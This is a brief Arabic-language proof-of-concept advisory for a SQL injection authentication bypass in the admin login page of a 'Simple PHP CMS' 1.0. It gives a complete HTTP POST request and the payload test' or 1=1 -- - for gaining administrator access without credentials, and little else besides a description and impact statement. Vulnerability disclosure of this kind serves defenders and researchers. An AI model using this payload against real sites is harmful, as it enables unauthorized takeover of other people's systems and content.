
إثبات مفهوم لتجاوز المصادقة عبر حقن SQL في نظام إدارة المحتوى البسيط PHP، مما يسمح للمهاجمين غير المصادقين بالحصول على وصول كمسؤول عبر معامل مستخدم مُصمم خصيصًا.
توجد ثغرة حقن SQL في صفحة تسجيل دخول المشرف في
نظام إدارة المحتوى البسيط PHP. معامل user لا يتم
تنظيفه قبل تمريره إلى استعلام SQL، مما يسمح
لمهاجم غير مصادق بتجاوز المصادقة والحصول على
وصول كامل كمسؤول.
/web/admin/login.phpusercode-projects.org
نظام إدارة المحتوى البسيط PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
أو فقط أضف هذا في صفحة تسجيل الدخول

test' or 1=1 -- -

يمكن لمهاجم عن بُعد غير مصادق تجاوز تسجيل دخول المشرف تمامًا دون معرفة أي بيانات اعتماد، والحصول على تحكم كامل في لوحة المشرف بما في ذلك إضافة المحتوى.
Imad Alvi